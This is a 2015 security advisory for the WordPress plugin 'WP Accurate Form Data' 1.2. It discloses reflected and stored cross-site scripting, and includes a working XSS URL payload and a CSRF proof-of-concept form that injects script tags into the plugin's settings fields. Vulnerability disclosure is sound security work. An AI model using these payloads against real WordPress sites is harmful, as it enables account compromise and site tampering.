WordPress WP Accurate Form Data 1.2 XSS / CSRF
Posted on 04 August 2015
Title: WordPress 'WP Accurate Form Data' Plugin Version: 1.2 Author: Morten Nørtoft, Kenneth Jepsen & Mikkel Vej Date: 2015-06-21 Download: - https://wordpress.org/plugins/accurate-form-data-real-time-form-validation/ - https://plugins.svn.wordpress.org/accurate-form-data-real-time-form-validation/ Notified WordPress: 2015-06-21 ========================================================== ## Plugin description ========================================================== The plugin performs E-mail and Physical Address validations automatically for most wordpress contact forms. ## XSS Vulnerabilities ========================================================== The request URI is echo'ed into the HTML page without sanitization. This can be exploited with a malicious URL (keep in mind that most modern browsers encode the url). http://[URL]/wp-admin/options-general.php?page=Accu_Data_WP&a="><script>alert(1)</script> ---- The options on the admin settings page are displayed/stored without sanitization. This can be exploited with a crafted POST request. PoC (using CSRF): Log in as admin and submit the following form: <form method="POST" action="http://[URL]/wp-admin/options-general.php?page=Accu_Data_WP"> <input type="text" name="wClientKey" value=""><script>alert(1)</script>"><br /> <text>wCheckEmailValidity: </text> <input type="text" name="wCheckEmailValidity" value=""><br /> <input type="text" name="wIncludeOpen" value=""><br /> <input type="text" name="wEmailBlockAttempts" value=""><script>alert(4)</script>"><br /> <input type="text" name="wEmailFields" value=""><script>alert(5)</script>"><br /> <input type="text" name="wCheckPhysicalAddressValidity" value=""><br /> <input type="text" name="wPhysicalAddressBlockAttempts" value=""><script>alert(7)</script>"><br /> <input type="text" name="wCityFields" value=""><script>alert(8)</script>"><br /> <input type="text" name="wZipFields" value=""><script>alert(9)</script>"><br /> <input type="text" name="wAddressFields" value=""><script>alert(10)</script>"><br /> <input type="text" name="wStateFields" value=""><script>alert(11)</script>"><br /> <input type="text" name="wCountryFields" value=""><script>alert(12)</script>"><br /> <text>wSub </text> <input type="text" name="wSub" value="Save Changes" readonly><br /> <input type="submit"> </form> ## Solution ========================================================== No fix available ========================================================== XSS vulnerabilities found using Eir; an early stage static vulnerability scanner for PHP applications.
